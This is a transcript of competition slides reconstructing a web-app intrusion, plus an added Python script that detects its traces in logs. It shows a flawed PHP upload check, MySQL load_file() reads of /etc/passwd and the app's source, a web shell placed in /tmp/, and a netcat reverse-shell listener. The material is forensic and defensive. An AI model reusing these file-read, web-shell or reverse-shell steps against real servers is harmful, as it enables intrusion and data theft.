MBSD Cybersecurity Challenges 2018 最終審査会 発表スライド

8ayac
December 12, 2018

Presented as team IPFactory.


Transcript

  1. MBSD Cybersecurity Challenges 2018

  10. sendmessage.php

    // Attachment handling from sendmessage.php, as shown on the slide.
    // The upload is moved into ./tmp/ first and the name check runs only afterwards,
    // so a file whose name does not match /\.jpg$/ has already been stored under ./tmp/.
    $prefix = md5(time() . $user->id);
    $tname = $prefix . basename($_FILES["file"]["name"]);
    if (move_uploaded_file($_FILES['file']['tmp_name'], "./tmp/".$tname) && preg_match("/^[^.]+\.jpg$/",$tname)) {

  11. sendmessage.php (2018/9/21 14:46:48)
    180921 14:39:24 26247 Connect [email protected] on mysql
    180921 14:41:06 26247 Query select load_file('/etc/hosts')
    180921 14:41:12 26247 Query select load_file('/etc/passwd')
    180921 14:42:30 26247 Query select load_file('/etc/issue')
    180921 14:42:45 26247 Query select load_file('/etc/httpd/conf/httpd.conf')
    180921 14:43:32 26247 Query select load_file('/var/www/html/webmix3/index.php')
    180921 14:44:30 26247 Query select load_file('/var/www/html/webmix3/login.php')
    180921 14:44:54 26247 Query select load_file('/var/www/html/webmix3/libs.php')
    180921 14:45:25 26247 Query select load_file('/var/www/html/webmix3/class/class.php')
    180921 14:45:45 26247 Query select load_file('/var/www/html/webmix3/class/User.php')
    180921 14:46:48 26247 Query select load_file('/var/www/html/webmix3/sendmessage.php')

  12-16. Web Shell (2018/9/21 15:12:46)
    (slide diagram: web server 192.168.11.2; uploaded file 7449f92ea0f26445e89ae968227efaabtest.php)
    [Fri Sep 21 15:14:01 2018] [error] [client 192.168.11.204] PHP Notice: Undefined index: cmd in /var/www/html/webmix3/tmp/7449f92ea0f26445e89ae968227efaabtest.php on line 1
    [Fri Sep 21 15:14:01 2018] [error] [client 192.168.11.204] PHP Warning: system(): Cannot execute a blank command in /var/www/html/webmix3/tmp/7449f92ea0f26445e89ae968227efaabtest.php on line 1
    192.168.11.204 - - [21/Sep/2018:15:14:01 +0900] "GET /tmp/7449f92ea0f26445e89ae968227efaabtest.php HTTP/1.1" 200 58 "-" "Mozilla/5.0 (X11; Linux 86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
    192.168.11.204 - - [21/Sep/2018:15:12:46 +0900] "POST /sendmessage.php HTTP/1.1" 200 1783 "http://192.168.11.2/sendmessage.php" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"

  17-21. (2018/9/21 15:29:02)
    (slide diagram: web server 192.168.11.2; waiting for connections on 4444/TCP…)
    $ nc -lvp 4444
    Listening on [0.0.0.0] (family 0, port 4444)
    Connection from 192.168.11.204 64495 received!
    sh-4.1$
    192.168.11.204 - - [21/Sep/2018:15:29:02 +0900] "POST /tmp/7449f92ea0f26445e89ae968227efaabtest.php HTTP/1.1" 200 58 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
    192.168.11.204 - - [21/Sep/2018:15:14:01 +0900] "GET /tmp/7449f92ea0f26445e89ae968227efaabtest.php HTTP/1.1" 200 58 "-" "Mozilla/5.0 (X11; Linux 86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
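The three log sources on slides 11 to 21 (MySQL general query log, Apache error log, Apache access log) each carry one indicator of the intrusion the deck reconstructs: load_file() reads through SQL, PHP notices raised by a script inside the upload directory, and HTTP requests for a .php file under /tmp/. The following Python script is an added example, not code from the deck or from team IPFactory: it parses the log lines copied from the slides, flags those three indicators and merges them into one ordered timeline. It assumes /tmp/ is the upload directory (taken from the paths on the slides) and that all three logs use the same local time; the "select 1" query is a constructed benign control line.

```python
"""Rebuild the intrusion timeline from the three log sources shown on the slides."""
import re
from datetime import datetime
from typing import List, NamedTuple

UPLOAD_DIR = "/tmp/"  # upload directory as seen in the deck's paths and URLs (assumption)


class Finding(NamedTuple):
    ts: datetime      # naive local time; the deck's logs are all in the same zone (JST)
    source: str       # "mysql", "apache-error" or "apache-access"
    actor: str        # DB thread id or client IP
    indicator: str
    detail: str


# Log lines copied from the slides; the "select 1" line is constructed as a benign control.
MYSQL_GENERAL_LOG = """\
180921 14:40:00 26247 Query select 1
180921 14:41:06 26247 Query select load_file('/etc/hosts')
180921 14:41:12 26247 Query select load_file('/etc/passwd')
180921 14:46:48 26247 Query select load_file('/var/www/html/webmix3/sendmessage.php')
"""
APACHE_ERROR_LOG = """\
[Fri Sep 21 15:14:01 2018] [error] [client 192.168.11.204] PHP Notice: Undefined index: cmd in /var/www/html/webmix3/tmp/7449f92ea0f26445e89ae968227efaabtest.php on line 1
[Fri Sep 21 15:14:01 2018] [error] [client 192.168.11.204] PHP Warning: system(): Cannot execute a blank command in /var/www/html/webmix3/tmp/7449f92ea0f26445e89ae968227efaabtest.php on line 1
"""
APACHE_ACCESS_LOG = """\
192.168.11.204 - - [21/Sep/2018:15:12:46 +0900] "POST /sendmessage.php HTTP/1.1" 200 1783 "http://192.168.11.2/sendmessage.php" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
192.168.11.204 - - [21/Sep/2018:15:14:01 +0900] "GET /tmp/7449f92ea0f26445e89ae968227efaabtest.php HTTP/1.1" 200 58 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
192.168.11.204 - - [21/Sep/2018:15:29:02 +0900] "POST /tmp/7449f92ea0f26445e89ae968227efaabtest.php HTTP/1.1" 200 58 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
"""

# MySQL general log: "yymmdd hh:mm:ss <thread> <command> <argument>"
MYSQL_RE = re.compile(r"^(\d{6})\s+(\d{1,2}:\d{2}:\d{2})\s+(\d+)\s+(\w+)\s*(.*)$")
LOAD_FILE_RE = re.compile(r"\bload_file\s*\(\s*'([^']*)'", re.IGNORECASE)
# Apache 2.2 error log: "[timestamp] [level] [client ip] message"
ERROR_RE = re.compile(r"^\[([^\]]+)\] \[(\w+)\] \[client ([\d.]+)\] (.*)$")
UPLOADED_SCRIPT_RE = re.compile(rf"\bin (\S*{re.escape(UPLOAD_DIR)}\S+\.php)\b")
# Apache combined access log: leading fields up to status and size are enough here
ACCESS_RE = re.compile(r'^([\d.]+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\d+|-)')


def scan_mysql(log: str) -> List[Finding]:
    """Flag queries that read files with load_file(); on the slides this is how
    the application source, including sendmessage.php, was disclosed."""
    found = []
    for line in log.splitlines():
        m = MYSQL_RE.match(line)
        if not m:
            continue
        date, clock, thread, command, argument = m.groups()
        hit = LOAD_FILE_RE.search(argument) if command == "Query" else None
        if hit:
            ts = datetime.strptime(f"{date} {clock}", "%y%m%d %H:%M:%S")
            found.append(Finding(ts, "mysql", f"thread {thread}", "load_file", hit.group(1)))
    return found


def scan_error_log(log: str) -> List[Finding]:
    """Flag PHP notices/warnings raised by a script inside the upload directory:
    files stored there are supposed to be images, so PHP running from it is a red flag."""
    found = []
    for line in log.splitlines():
        m = ERROR_RE.match(line)
        if not m:
            continue
        stamp, _level, client, message = m.groups()
        hit = UPLOADED_SCRIPT_RE.search(message)
        if hit:
            ts = datetime.strptime(stamp, "%a %b %d %H:%M:%S %Y")
            found.append(Finding(ts, "apache-error", client, "php-in-upload-dir", hit.group(1)))
    return found


def scan_access_log(log: str) -> List[Finding]:
    """Flag HTTP requests for a .php resource under the upload directory; the deck
    shows the GET that probes the shell and the POST that opens the reverse shell."""
    found = []
    for line in log.splitlines():
        m = ACCESS_RE.match(line)
        if not m:
            continue
        client, stamp, method, target, status, _size = m.groups()
        path = target.split("?", 1)[0]
        if path.startswith(UPLOAD_DIR) and path.lower().endswith(".php"):
            # Drop the "+0900" offset so every source yields a naive local timestamp.
            ts = datetime.strptime(stamp.split(" ", 1)[0], "%d/%b/%Y:%H:%M:%S")
            found.append(Finding(ts, "apache-access", client, "request-to-uploaded-php",
                                 f"{method} {path} -> {status}"))
    return found


def build_timeline(mysql_log: str, error_log: str, access_log: str) -> List[Finding]:
    """Merge the three sources into one chronologically ordered list of findings."""
    events = scan_mysql(mysql_log) + scan_error_log(error_log) + scan_access_log(access_log)
    return sorted(events, key=lambda f: (f.ts, f.source))


if __name__ == "__main__":
    for f in build_timeline(MYSQL_GENERAL_LOG, APACHE_ERROR_LOG, APACHE_ACCESS_LOG):
        print(f"{f.ts:%Y-%m-%d %H:%M:%S}  {f.source:<14} {f.actor:<15} {f.indicator:<24} {f.detail}")
```

On the slides' own lines the merged output runs from the first load_file() read at 14:41:06, through the upload POST at 15:12:46 (which the script leaves unflagged, since the request itself looks legitimate) and the GET of the stored script at 15:14:01, to the POST at 15:29:02 that coincides with the netcat listener receiving its connection. To apply the same checks to real files, pass their contents to build_timeline; the naive-timestamp shortcut only holds while all three logs share a zone.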
